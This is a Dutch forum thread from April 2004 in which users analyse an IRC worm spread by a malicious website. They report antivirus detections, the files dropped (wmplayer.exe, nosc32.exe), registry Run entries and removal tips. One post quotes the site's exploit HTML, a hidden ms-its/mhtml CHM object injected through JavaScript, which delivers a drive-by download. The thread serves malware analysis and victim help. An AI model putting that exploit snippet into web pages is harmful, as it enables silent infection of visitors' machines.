Ik heb liever niet dat je de url hier neerzet iig.

zaterdag 3 april 2004 17:31

Acties:

blix

ook goed, ben weg dus mail hem morgen wel.

[ Voor 86% gewijzigd door blix op 03-04-2004 17:34 ]

zaterdag 3 april 2004 17:34

Acties:

zaterdag 3 april 2004 17:45

Blablabla

Schouw zegt nog: geen link...

Maargoed, McAfee detecteert twee virussen als je die site bezoekt:

loi[1].exe en wmplayer.exe, beide W32/Cult.worm.gen, meer info @ http://vil.nai.com/vil/content/v_100105.htm

Virussen? Scan ze hier!

Acties:

zaterdag 3 april 2004 17:46

Schouw zegt nog: geen link...

Kan dat niet in de Policy ?

wildhagen schreef op 03 april 2004 @ 17:34:

Maargoed, McAfee detecteert twee virussen als je die site bezoekt:

loi[1].exe en wmplayer.exe, beide W32/Cult.worm.gen, meer info @ http://vil.nai.com/vil/content/v_100105.htm

_{Hoe flagged ie m hier ?}

"Religion is an insult to human dignity. With or without it you would have good people doing good things and evil people doing evil things. But for good people to do evil things, that takes religion." - Steven Weinberg

Acties:

Verwijderd

Ik heb drie verschillende files gezien zo op het eerste gezicht..
Allemaal door KAV gedetecteerd als Backdoor.IRCBot.gen

zaterdag 3 april 2004 17:49

Acties:

zaterdag 3 april 2004 18:04

Blablabla

0xDEADBEEF schreef op 03 april 2004 @ 17:45:

[...]

_{Hoe flagged ie m hier ?}

Ik heb geen idee. Het is een file die automatisch gedownload word bij het bezoeken van die site, en aangezien ik geen KAV draai, en absoluut geen zin heb om mijn eigen virussanner te disablen (en dus besmet te raken), mag iemand anders dat proberen

Als je wil kan ik je de link mailen (in je profile staat geen adres, dus als je hem wil, kan je ff mailen, aangezien de oorspronkelijke poster kennelijk weg is nu).

Virussen? Scan ze hier!

Acties:

Verwijderd

wildhagen schreef op 03 april 2004 @ 17:49:
[...]

Ik heb geen idee. Het is een file die automatisch gedownload word bij het bezoeken van die site, en aangezien ik geen KAV draai, en absoluut geen zin heb om mijn eigen virussanner te disablen (en dus besmet te raken), mag iemand anders dat proberen

Maar je bent wel zo gek om zo de proef op de som te nemen?

Nouja, results staan al hierboven, nouja, het ding is ook nog gepacked met FSG, dat had ik er nog niet bijgezegd.

zaterdag 3 april 2004 18:07

Acties:

zaterdag 3 april 2004 20:25

Blablabla

Verwijderd schreef op 03 april 2004 @ 18:04:
[...]

Maar je bent wel zo gek om zo de proef op de som te nemen?

Ja, op een testbak ja, die los staat van mijn normale werkbak (fysiek, dus er lopen geen kabeltjes tussen die twee dozen), en die voorzien is van DeepFreeze, zodat hij na elke reboot weer kraakschoon is, mocht dat nodig zijn

Ben ook weer niet zo gek om dit soort sites op mijn normale werkbak te draaien.

Edit: hmm, bij nadere beschouwing had ik dus toch kunnen disablen en ff online-scannen bij KAV. Tis weekend, dan ben ik niet zo helder meer

[ Voor 14% gewijzigd door wildhagen op 03-04-2004 18:08 ]

Virussen? Scan ze hier!

Acties:

Verwijderd

is /f-tri/ hier een variant op? dat zie ik ook ineens overal op irc

zaterdag 3 april 2004 20:33

Acties:

Verwijderd

Verwijderd schreef op 03 april 2004 @ 20:25:
is /f-tri/ hier een variant op? dat zie ik ook ineens overal op irc

Yup, deze wordt vanaf hier besproken.
[rml]blix in "[ IRC-Worm] Mirc.exe lol.bat lol.lnk"[/rml]
Alleen werkt deze ietsje anders als de twee eerdere 'varianten'.

Edit: De gebruikte exploit wordt nu geflagged als "JS.Borge"

[ Voor 8% gewijzigd door Verwijderd op 03-04-2004 21:11 ]

zondag 4 april 2004 14:22

Acties:

SithWarrior

Ik ben uniek, net als iedereen

Verwijderd schreef op 03 april 2004 @ 20:25:
is /f-tri/ hier een variant op? dat zie ik ook ineens overal op irc

Hmm die variant heb ik blijkbaar ook, die spam ik ineens overal op IRC, belangrijker is hoe kom je van deze zooi af, NAV 2004 met virus defs van gisteren ziet helemaal niks en ik kan zelf ook geen abnormale procesen ondekken of files die dit veroorzaken..

Hmm meschien dat nsc32.exe is kan zijn ?

[ Voor 6% gewijzigd door SithWarrior op 04-04-2004 14:30 ]

You can take a picture of something you see. In the future, where will I be?

zondag 4 april 2004 15:21

Acties:

Verwijderd

code:

<!-- VVZkV2RXSXpaeja1 -->
<textarea style='display:none;' id='code'>
    <object data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm" type="text/x-scriptlet"></object>
</textarea>

<SCRIPT language="javascript">
curpg = location.href;
document.write(code.value.replace(/\${PATH}/g,curpg.substring(0,location.href.indexOf('loi.htm'))));
</SCRIPT>
<!-- VVZkV2RXSXpaeja1 -->

Als Microsoft nou eens een patch maakte voor dat .chm gezeik. Desnoods een patch die het filetype .chm uitvoeren disabled.

[ Voor 15% gewijzigd door Verwijderd op 04-04-2004 15:21 ]

zondag 4 april 2004 15:22

Acties:

Verwijderd

SithWarrior schreef op 04 april 2004 @ 14:22:
[...]

Hmm meschien dat nsc32.exe is kan zijn ?

Ja, die is het.

zondag 4 april 2004 18:16

Acties:

SithWarrior

Ik ben uniek, net als iedereen

Hmm ja had em al gedelete, kon em nergens thuis brengen

alleen vraag ik me af wat ie nou allemaal deed behalve die URL op irc spammen. En of dat wel het enige bestandje was wat er bij hoorde..

You can take a picture of something you see. In the future, where will I be?

zondag 4 april 2004 19:06

Acties:

Verwijderd

NAV dit topic: IRC VIRUS: osama.bin-laden.((

Je wordt geredirect.
wmplayer.exe wordt gedownload in "program files\windows media player"
Daarna wordt(ook door de exploit)de media player gelaunched.

Mensen die dus 2k runnen zonder wmp7+, zijn 'veilig', want daar heeft wmp de naam "mplayer2.exe" en wordt wmplayer.exe dus niet gerund.

Zodra wmplayer.exe gerund wordt, wordt er een sample gekopieerd naar %systemdir% als "nosc32.exe" en deze wordt gelaunched.
Deze wil contact maken met IRC channels om daar de url te spammen.

Verdere payload:
Er wordt door nosc32.exe een poort opengezet waardoor de besmette machine dus in een (potentiële) bot veranderd wordt.

Edit:
Gemaakte regentries:

code:

1 2	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IE Processes="nosc32.exe " HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\IE Processes="nosc32.exe

[ Voor 14% gewijzigd door Verwijderd op 04-04-2004 19:11 ]

zondag 4 april 2004 19:56

Acties:

zondag 4 april 2004 19:58

[Ondertitel]

nvsvc32.exe << is dat ook iets van en worm? (lijkt gwn bestandje van compaq te zijn, maar ben toch benieuwd...)

[ Voor 49% gewijzigd door woest85 op 04-04-2004 19:58 ]

[Signature]

Acties:

zondag 4 april 2004 20:08

Blablabla

woest85 schreef op 04 april 2004 @ 19:56:
nvsvc32.exe << is dat ook iets van en worm?

Nee, dat is van Nvidia: http://www.liutilities.co...o/processlibrary/nvsvc32/

Hoe wel er natuurlijk ook virussen/trojans kunnen zijn die deze naam gebruiken....

Virussen? Scan ze hier!

Acties: